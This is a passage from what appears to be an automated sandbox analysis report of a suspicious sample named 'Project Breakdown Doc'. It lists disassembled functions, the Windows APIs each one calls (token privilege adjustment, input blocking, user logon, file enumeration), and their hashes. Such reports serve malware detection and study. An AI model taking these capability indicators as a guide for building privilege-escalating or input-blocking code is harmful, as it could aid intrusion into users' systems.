                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                  • String ID:
                                                  • API String ID: 1922334811-0
                                                  • Opcode ID: 89b3a087c42c399f60eba923cb204242a0b67ac493ceff2a5e3a03577b38e243
                                                  • Instruction ID: 9c9922b8cd7189df894dca312f3ec770fd5fb272f793b499cf321aaab2156f9a
                                                  • Opcode Fuzzy Hash: 89b3a087c42c399f60eba923cb204242a0b67ac493ceff2a5e3a03577b38e243
                                                  • Instruction Fuzzy Hash: 6811C1B2414209AFDB28DF54DCC9E6BB7BDFB04710B24852EF45693241EB70AC458A60
                                                  Function 00CA4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00CA4C2C
                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00CA4C43
                                                  • FreeSid.ADVAPI32(?), ref: 00CA4C53
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                  • String ID:
                                                  • API String ID: 3429775523-0
                                                  • Opcode ID: 0e79e600c6dc3330e6ae9b51ccb20a2559b997e932ed674598920bec2ac635ec
                                                  • Instruction ID: dc80e1762c77ad0fa6fa7ed621a163e2b6dc5f1a103694543dbd12a95018bbb5
                                                  • Opcode Fuzzy Hash: 0e79e600c6dc3330e6ae9b51ccb20a2559b997e932ed674598920bec2ac635ec
                                                  • Instruction Fuzzy Hash: EAF03775A51209BBDB04DFE0DC89EAEBBB9EB08611F0044A9E901E2181E7706A048B50
                                                  Function 00C4E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d81925700941cebe7cb33296ac815cd4e928846efa21bc317f39e8236de9680f
                                                  • Instruction ID: 67f35f335e522f4e0892ba0a857ca595ad8a7e63e927e9d32fb39f6bba62b5c0
                                                  • Opcode Fuzzy Hash: d81925700941cebe7cb33296ac815cd4e928846efa21bc317f39e8236de9680f
                                                  • Instruction Fuzzy Hash: CA228E74A00216DFDB24DF58C480ABEB7F1FF04300F198569E866AB351E774AE85DB91
                                                  Function 00CAC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00CAC966
                                                  • FindClose.KERNEL32(00000000), ref: 00CAC996
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 160e2237ed1c4b208175163ae5ae846147e7f272cf0098ff2ddbb8568abd3764
                                                  • Instruction ID: afec3e7c2fde297f2a5721861e78fff4c82bab6c6d90e9b9744f250d906e725e
                                                  • Opcode Fuzzy Hash: 160e2237ed1c4b208175163ae5ae846147e7f272cf0098ff2ddbb8568abd3764
                                                  • Instruction Fuzzy Hash: AB113C726106109FDB10AF29D845A2AB7E9FF95324F04851EF9A9D72A1DB30A901DB81
                                                  Function 00CAA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00CB977D,?,00CCFB84,?), ref: 00CAA302
                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00CB977D,?,00CCFB84,?), ref: 00CAA314
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ErrorFormatLastMessage
                                                  • String ID:
                                                  • API String ID: 3479602957-0
                                                  • Opcode ID: e9384deff2bbde2189f483793b6357726d0d9b1643b144e65d4eab309171c701
                                                  • Instruction ID: 17e9a7e74bb4635e18df6412ab72c89399b1df958517eed88a92061dc4c21ded
                                                  • Opcode Fuzzy Hash: e9384deff2bbde2189f483793b6357726d0d9b1643b144e65d4eab309171c701
                                                  • Instruction Fuzzy Hash: 29F0823554522DBBEB109FA4CC48FEA776DBF09761F008269F918D6191D7309944CBA1
                                                  Function 00C98713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C98851), ref: 00C98728
                                                  • CloseHandle.KERNEL32(?,?,00C98851), ref: 00C9873A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                  • String ID:
                                                  • API String ID: 81990902-0
                                                  • Opcode ID: 3bc94b199bc86ca4d7b309beda46ac5e3575ef6f18237d8c77336a3351526830
                                                  • Instruction ID: 1e9bc9e264d95d47af5c1717ebb2bd00624d5beae3f4ea6c03b99036ac50498a
                                                  • Opcode Fuzzy Hash: 3bc94b199bc86ca4d7b309beda46ac5e3575ef6f18237d8c77336a3351526830
                                                  • Instruction Fuzzy Hash: 2BE0BF75010550EEEB352B60EC49E7777A9EB04751718842DF95680470DB615C91DB50
                                                  Function 00C6A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00C68F97,?,?,?,00000001), ref: 00C6A39A
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C6A3A3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 08dc505389ff6745cc4321c4572e54b3cfd320297463e9e3b733ea3fb3d8dcc8
                                                  • Instruction ID: 012db46dee4da3b17651d9abe2de0d3de7e410601b298289cea6eddea359385f
                                                  • Opcode Fuzzy Hash: 08dc505389ff6745cc4321c4572e54b3cfd320297463e9e3b733ea3fb3d8dcc8
                                                  • Instruction Fuzzy Hash: DAB09231054248BBCA002B91EC09F8C3F6AEB84AA2F444024FA0D84070CB6256528A91
                                                  Function 00C6F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4e45b3a66d5df165ce5da527c19f5217745f17823ef5607741bafd21228870c1
                                                  • Instruction ID: ad82bcf3c8838b84d1405267da2bee096d459878fb435ff0a254855f335a7767
                                                  • Opcode Fuzzy Hash: 4e45b3a66d5df165ce5da527c19f5217745f17823ef5607741bafd21228870c1
                                                  • Instruction Fuzzy Hash: EF32F422D69F015ED7339634D872339A349AFB73C4F55D73BE829B59A6EB3885834100
                                                  Function 00C7267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 73f1896fd5ad6b3bae31e91742389f83fe361db41cbecb0918fb5f1e33affea1
                                                  • Instruction ID: fa9ec66238dc5808953f41f38dccebc7d51147d7e8b24c6ef44f82534c9da6aa
                                                  • Opcode Fuzzy Hash: 73f1896fd5ad6b3bae31e91742389f83fe361db41cbecb0918fb5f1e33affea1
                                                  • Instruction Fuzzy Hash: 1FB1F220D2AF414DD7239639883133AB75CAFBB2D5F51E71BFC2A74D22EB2185834141
                                                  Function 00CA8B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __time64.LIBCMT ref: 00CA8B25
                                                    • Part of subcall function 00C6543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00CA91F8,00000000,?,?,?,?,00CA93A9,00000000,?), ref: 00C65443
                                                    • Part of subcall function 00C6543A: __aulldiv.LIBCMT ref: 00C65463
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                  • String ID:
                                                  • API String ID: 2893107130-0
                                                  • Opcode ID: b8a2e21db72e64f9a6d2ccdbbdcad7ed7dadfa585f1dad7b1d3ddb2cc7a17a09
                                                  • Instruction ID: 971cef023cbaf4cf679435c59728f3c03158600963a6fc59ed92e001f4415e33
                                                  • Opcode Fuzzy Hash: b8a2e21db72e64f9a6d2ccdbbdcad7ed7dadfa585f1dad7b1d3ddb2cc7a17a09
                                                  • Instruction Fuzzy Hash: 5221D2726256118BC729CF25D841B52B3E1EBA5311B288E6CD1F9CF2D0CA74BD05CBA4
                                                  Function 00CB41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • BlockInput.USER32(00000001), ref: 00CB4218
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: BlockInput
                                                  • String ID:
                                                  • API String ID: 3456056419-0
                                                  • Opcode ID: 33a03b870616b279f99cfba8c735691632ec8176e2d3f1ae1ad7ece9154666bb
                                                  • Instruction ID: d3c3fd0c4ba2ca8447a8f9215f9fb34c7660587220ab6da2c6ab26c1afdc7921
                                                  • Opcode Fuzzy Hash: 33a03b870616b279f99cfba8c735691632ec8176e2d3f1ae1ad7ece9154666bb
                                                  • Instruction Fuzzy Hash: C6E04F712842149FC710EF5AD845E9BF7E8EF94760F00802AFC4AC7352DA70E8419BA1
                                                  Function 00CA4EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00CA4EEC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: mouse_event
                                                  • String ID:
                                                  • API String ID: 2434400541-0
                                                  • Opcode ID: fa59335d615e7803e1ba9a5d86fdd181f6549c10469891e958f5aa022048a91b
                                                  • Instruction ID: 4f5a8ff72a40f4b3ed31441a354f578ce5afe3e346182096375e6a4f824e2716
                                                  • Opcode Fuzzy Hash: fa59335d615e7803e1ba9a5d86fdd181f6549c10469891e958f5aa022048a91b
                                                  • Instruction Fuzzy Hash: 90D05E981606077AEC5C4B249C5FF778159F38278DFE0414AB112890C1D8D06D516030
                                                  Function 00C98C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00C988D1), ref: 00C98CB3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: LogonUser
                                                  • String ID:
                                                  • API String ID: 1244722697-0
                                                  • Opcode ID: 8e49299696e6c7b4ccaa008b67ace5702d8a53e6c61f1a8553a34c241ccb184a
                                                  • Instruction ID: 7e3fb55834bf5f140635992292357b50a47e906f8c885e70d899915422f7d489
                                                  • Opcode Fuzzy Hash: 8e49299696e6c7b4ccaa008b67ace5702d8a53e6c61f1a8553a34c241ccb184a
                                                  • Instruction Fuzzy Hash: 04D09E3226450EABEF019FA4DD05EAE3B6AEB04B01F408511FE15D51A1C775D935AB60
                                                  Function 00C82230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetUserNameW.ADVAPI32(?,?), ref: 00C82242
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: NameUser
                                                  • String ID:
                                                  • API String ID: 2645101109-0
                                                  • Opcode ID: 77026fcc8f9250513b73db2ff1025bf9396ac5c96dcc52df730f7fd1265f543e
                                                  • Instruction ID: 2769d08b295f2b7918f9af5ec1bfa4d94e46da7765c136c398562bdeba2a500c
                                                  • Opcode Fuzzy Hash: 77026fcc8f9250513b73db2ff1025bf9396ac5c96dcc52df730f7fd1265f543e
                                                  • Instruction Fuzzy Hash: F6C04CF1801109DBDB05DB90D988EFE77FDAB04304F144066E502F2100D7749B458B71
                                                  Function 00C6A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C6A36A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 76241b8f322880a8de678f1568d38dba3d870b950389d2c217066a9de3c11825
                                                  • Instruction ID: 8cd968c54b85ae52c835287eac275d7de6a228eca1e8a79fca7cc7da4375848b
                                                  • Opcode Fuzzy Hash: 76241b8f322880a8de678f1568d38dba3d870b950389d2c217066a9de3c11825
                                                  • Instruction Fuzzy Hash: AAA0123000010CB78A001B41EC049487F5DD6401907004020F40C40031873255114580
                                                  Function 00C58A0E Relevance: .6, Instructions: 608COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dcbb1b4c3a21659762f721757aa47216faf61e0bf88925e4913d301fa2e77402
                                                  • Instruction ID: 141e32c2aa312d97d274c576d423afb903669e3c8804af66bafcf68efdbbe07e
                                                  • Opcode Fuzzy Hash: dcbb1b4c3a21659762f721757aa47216faf61e0bf88925e4913d301fa2e77402
                                                  • Instruction Fuzzy Hash: D9223734901616CBDF29CB19C48867D77A1FB41341F24446ADC62AB291DB30EFCDCB69
                                                  Function 00C62405 Relevance: .3, Instructions: 345COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                  • Instruction ID: d4fe4969bb5e7c31c5b46747ee17d9088feaa88eb6f721ac007f92f0841f0558
                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                  • Instruction Fuzzy Hash: CCC1813220559309DB3D467AD4B453FBAE15BA27B231E076DE8B3CB5D4EF20D624E620
                                                  Function 00C6283A Relevance: .3, Instructions: 341COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction ID: 1367f411c138ff5326849e88d8103c7e059138dc4978a01504b4b23194781c2e
                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction Fuzzy Hash: AEC185322055930ADB3D467A84B403FBBE15B927B231E076DE8B3DB5D5EF10D624E620
                                                  Function 00C61BB8 Relevance: .3, Instructions: 323COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
